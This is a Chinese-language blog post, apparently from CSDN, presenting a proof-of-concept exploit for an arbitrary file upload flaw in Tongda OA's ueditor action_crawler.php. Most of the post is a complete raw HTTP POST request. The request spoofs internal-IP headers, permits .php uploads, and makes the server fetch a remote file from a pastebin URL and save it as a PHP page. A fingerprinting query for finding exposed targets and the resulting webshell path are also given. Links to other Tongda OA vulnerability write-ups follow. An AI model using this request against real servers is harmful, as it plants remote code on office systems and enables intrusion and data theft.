通达OA action_crawler.php 任意文件上传

最新推荐文章于 2024-07-19 12:43:35 发布
最新推荐文章于 2024-07-19 12:43:35 发布
阅读量434 收藏
点赞数 2
文章标签: 爬虫 php 开发语言 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/135951248
版权

漏洞描述

网络资产测绘

app=“TDXK-通达OA”
在这里插入图片描述

Poc
POST /module/ueditor/php/action_crawler.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Content-Length: 213
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

CONFIG[catcherPathFormat]=/api/zuk8abxcbg&CONFIG[catcherMaxSize]=100000&CONFIG[catcherAllowFiles][]=.php&CONFIG[catcherAllowFiles][]=.ico&CONFIG[catcherFieldName]=file&file[]=https://pastebin.com/raw/0DuNGn7n#.php

判定结果

image.png
http://ip:port/api/zuk8abxcbg.php

qq_36334672
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通达OA前台action任意文件上传
xiaokp7的博客
08-02 643
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞。
通达OA V11.6 RCE(远程代码执行)漏洞复现
weixin_39811856的博客
02-25 468
根据脚本来瞅瞅这次的问题出在print.php这个问题 1.这个GET没有进行身份验证,所以可以随意访问 2.unlink() 函数删除文件。 <?php $s_tmp = __DIR__ . '/../../../../logs/appbuilder/logs'; $s_tmp .= '/' . $_GET['guid']; if (file_exists($s_tmp)) { $arr_data = unserialize(file_get_contents($s_tmp.
通达OA检测工具-TongdaOATools
siu~
08-15 692
通达OAEXP合集大礼包
通达OA v2017 action_upload.php 任意文件上传漏洞.md
09-07
通达OA漏洞合集
修复通达OA 百度ueditor 文件上传漏动
10年老码农
03-04 571
接着,我看了这到它有一个controller.php,是去读取config.json。也就是说,它绕过了controller.php,直接请求了上传文件。前些日子,服务器阿里云监控报警,有文件木马文件,因为非常忙,就没及时处理,直接删除了木马文件了事。谁知,这几天对方又上传了木马文件。好家伙,今天不花点时间修复下,你都传上瘾了。下载了一份代码,查看它也有文件类型检查,但他是怎么不生效的呢?允许的文件类型如下。接着,我去看了所使用的版本:1.4.3。知道了问题点,那就修复一下吧。上传,测试了下,可用够用。
通达OA 任意文件上传+文件包含导致RCE
Adminxe的博客
09-23 1334
0x00 漏洞描述 ispirit/im/upload.php存在绕过登录(任意文件上传漏洞),结合gateway.php处存在的文件包含漏洞,最终导致getshell,或者直接利用日志文件写入shell,然后结合文件包含漏洞getshell 0x01 漏洞影响版本 通达OA V11版 <= 11.3 20200103 通达OA 2017版 <= 10.19 20190522 通达OA 2016版 <= 9.13 20170710 通达OA 2015版 <= 8.1...
通达OA检测工具-TongdaScan_go
siu~
08-15 543
通达OA漏洞检测工具-TongdaScan_go
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
oa.rar_OA.htm_PHP OA_oa php_源代码
09-19
本篇文章将深入探讨基于PHP语言OA办公管理系统,通过分析"oa.rar_OA.htm_PHP OA_oa php_源代码"的描述及标签,以及解压后的文件列表,我们将对这一系统的核心要素进行解析。 首先,OA.htm和PHP OA是系统的前端...
漏洞挖掘之通达OA2017任意文件上传(漏洞已失效)
crowsec
02-10 3291
通达OA系统代表了协同OA的先进理念,16年研发铸就成熟OA产品,协同OA软件行业唯一央企团队研发,多次摘取国内OA软件金奖,拥有2万多家正式用户,8万多家免费版用户。
数据挖掘新技能:Python爬虫编程指南
AI心易行者
07-18 1617
数据爬取是一个技术活,也是一个法律活。在享受数据带来的便利的同时,我们也应当注意合法合规地使用这些数据。希望本文能够帮助你入门Python数据爬取,并在未来的实践中更加得心应手。目前PlugLink发布了开源版和应用版,开源版下载地址:应用版下载地址:pwd=PLUG提取码:PLUG。
使用 Python 爬虫实现自动获取天气信息并语音播报
weixin_49816293的博客
07-16 516
通过本文的介绍,你应该能够了解如何使用 Python 来自动获取天气信息并进行语音播报。这是一个简单但实用的示例,可以根据个人需求进行扩展和定制。
Python 爬虫技术 第01节 引言
最新发布
hummhumm的专栏
07-19 995
在实施爬虫项目前,应进行充分的研究,了解目标网站的政策,必要时获取许可,并采取措施减少对目标网站的影响。例如,欧盟的GDPR对个人数据的保护极为严格,而美国的法律则更加注重言论自由和商业利益的保护。通过上述深入的法律和伦理分析,网络爬虫开发者和运营者可以更好地理解其活动的边界,制定出既合法又合乎道德的操作指南,促进网络空间的健康发展。: 如果可能,优先使用网站提供的API接口来获取数据,这样既能确保数据的准确性和时效性,也能减轻对网站基础设施的压力。这有助于增强用户的信任感,减少潜在的法律和伦理争议。
网络请求之urllib.parse的使用
冻冰粉星的博客
07-16 226
后面的参数:word=%E6%A8%B1%E7%94%B1%E7%BD%97 明显是汉字被编码了,因为爬虫就是要模拟浏览器发送请求给服务器,所以爬数据的时候就得根据url的实际情况进行编码,这就是urllib.parse的意义。为什么要解析呢,我来举个例子。urllib.parse的作用是解析url。
爬虫(二)——爬虫的伪装
liuzibujian的博客
07-17 1084
本文在上一篇文章的基础上,进一步介绍了爬虫的功能。这次通过爬虫的伪装,成功下载到了B站的视频。还顺便介绍了一点使用python做视频剪辑的功能。
破解反爬虫策略 /_guard/auto.js(二)实战
cjc000的博客
07-17 491
这次我们用上篇文章讲到的方法来真正破解一下反爬虫策略,这两个案例是两个不同的网站,一个用的是 /_guard/auto.js,另一个用的是/_guard/delay_jump.js。经过解析发现这两个网站用的反爬虫策略基本是一模一样,只不过在js混淆和生成guardret的算法上有很细微的差别,由此看来,以后请求其他网站,如果也是这种不返回正确的数据而是返回了一个js,那么也可以直接套用下面的代码做一些细微的调整即可。
python基础知识点(蓝桥杯python科目个人复习计划70)
m0_73523976的博客
07-16 368
但是,我不知道为啥,每次我运行这个代码,首先出来的是柱状图,将其关闭后还要过一会儿才会出现词云图,我一直不理解。小明对数位中含有2、0、1、9的数(不包含前导0)很感兴趣,在1到40中这样的数共有28个,它们的和是574。那这篇就这样了,我会在下一篇详细地写出scrapy爬取豆瓣的流程,感兴趣的朋友可以看一看,顺便指出我的错误。我自己的做法是将得到的数据保存为json格式,然后我要画出柱状图和词云图。今天只写一个题,灵感爆发,我想再续写一下爬虫的相关内容。共一行,包含一个整数,表示符合条件的数的和。
云网oa 2.2_cloundoa.rar
08-06
云网OA 2.2_CloudOA.rar是一个办公自动化软件的压缩包。云网OA是一款基于云平台的办公自动化系统,提供了员工管理、日程安排、会议管理、文档管理、通讯录管理等一系列办公功能。通过云网OA,用户可以实现信息的快速交流、高效办公、统一管理,提高工作效率。 该压缩包中的.rar文件后缀表示它是一种压缩文件格式,需要使用相应的解压软件(如WinRAR等)进行解压缩操作才能获得其中的文件和内容。一旦解压缩成功,你可以找到其中的程序文件和相关的文档。 云网OA 2.2代表软件的版本号,意味着这是软件的第二个主要版本,并可能包含了前一个版本的改进和修复了一些bug。这种版本更新可以提供更好的使用体验和更稳定的性能。 总而言之,云网OA 2.2_CloudOA.rar是一款办公自动化软件的压缩包,它通过云平台为用户提供了一系列办公功能,如员工管理、日程安排等。解压缩后,你可以获得软件的程序文件和相关文档,帮助你进行高效的办公工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值